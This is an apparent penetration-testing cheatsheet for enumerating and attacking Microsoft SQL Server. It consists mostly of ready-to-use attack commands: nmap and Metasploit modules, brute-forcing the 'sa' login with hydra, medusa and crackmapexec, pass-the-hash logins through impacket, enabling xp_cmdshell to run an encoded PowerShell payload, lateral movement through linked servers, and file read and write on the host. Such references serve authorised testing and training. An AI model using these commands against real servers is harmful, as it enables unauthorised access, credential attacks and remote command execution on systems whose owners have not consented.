MSSQL Enumeration Cheatsheet

Default Ports: 1433 (TCP), 1434 (UDP — SQL Server Browser)

Discovery & Nmap Scripts

nmap -p 1433 --script ms-sql-info <ip>
nmap -p 1433 --script ms-sql-config <ip>
nmap -p 1433 --script ms-sql-empty-password <ip>
nmap -p 1433 --script ms-sql-brute <ip>
nmap -sU -p 1434 --script ms-sql-dac <ip>     # Discover dynamic ports via UDP
nmap -p 1433 --script ms-sql-* <ip>            # All MSSQL scripts

Metasploit Modules

use auxiliary/scanner/mssql/mssql_ping        # Discovery + version
use auxiliary/scanner/mssql/mssql_login       # Brute force auth
use auxiliary/admin/mssql/mssql_sql           # Execute SQL query
use auxiliary/admin/mssql/mssql_exec          # OS command execution (xp_cmdshell)
use auxiliary/admin/mssql/mssql_enum          # Full enumeration
use auxiliary/admin/mssql/mssql_enum_sql_logins  # Enumerate SQL logins

mssqlclient.py (impacket)

# Connect with SQL auth
python3 mssqlclient.py <user>:<pass>@<ip>

# Connect with Windows auth
python3 mssqlclient.py <domain>/<user>:<pass>@<ip> -windows-auth

# Connect with hash (Pass-the-Hash)
python3 mssqlclient.py <domain>/<user>@<ip> -hashes :<nthash> -windows-auth

Useful SQL Queries

-- Version and user info
SELECT @@version;
SELECT system_user;
SELECT user_name();
SELECT DB_NAME();

-- Check if sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT IS_MEMBER('db_owner');

-- List databases
SELECT name FROM sys.databases;
USE <database>;
SELECT table_name FROM information_schema.tables;

-- List users and roles
SELECT name, type_desc FROM sys.server_principals;
SELECT name FROM sys.syslogins;
SELECT roles.name FROM sys.server_role_members
  JOIN sys.server_principals AS roles ON roles.principal_id = server_role_members.role_principal_id
  JOIN sys.server_principals AS members ON members.principal_id = server_role_members.member_principal_id
  WHERE members.name = '<user>';

xp_cmdshell (OS Command Execution)

-- Enable xp_cmdshell (requires sysadmin)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net user';
EXEC xp_cmdshell 'powershell -enc <base64payload>';

Linked Servers (Lateral Movement)

-- Enumerate linked servers
SELECT * FROM sys.servers;
EXEC sp_linkedservers;

-- Execute query on linked server
EXECUTE('SELECT @@version') AT [<linked_server>];
EXECUTE('SELECT system_user') AT [<linked_server>];

-- Execute OS command via linked server
EXECUTE('EXEC xp_cmdshell ''whoami''') AT [<linked_server>];

Brute Force

hydra -l sa -P wordlist.txt mssql://<ip>
medusa -h <ip> -u sa -P wordlist.txt -M mssql
crackmapexec mssql <ip> -u <user> -p wordlist.txt

File Read / Write

-- Read file (via BULK INSERT or OPENROWSET)
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS t;

-- Write file (via xp_cmdshell)
EXEC xp_cmdshell 'echo hacked > C:\inetpub\wwwroot\shell.txt';

MSSQL Enumeration Cheatsheet#

Discovery & Nmap Scripts#

Metasploit Modules#

mssqlclient.py (impacket)#

Useful SQL Queries#

xp_cmdshell (OS Command Execution)#

Linked Servers (Lateral Movement)#

Brute Force#

File Read / Write#

MSSQL Enumeration Cheatsheet

Discovery & Nmap Scripts

Metasploit Modules

mssqlclient.py (impacket)

Useful SQL Queries

xp_cmdshell (OS Command Execution)

Linked Servers (Lateral Movement)

Brute Force

File Read / Write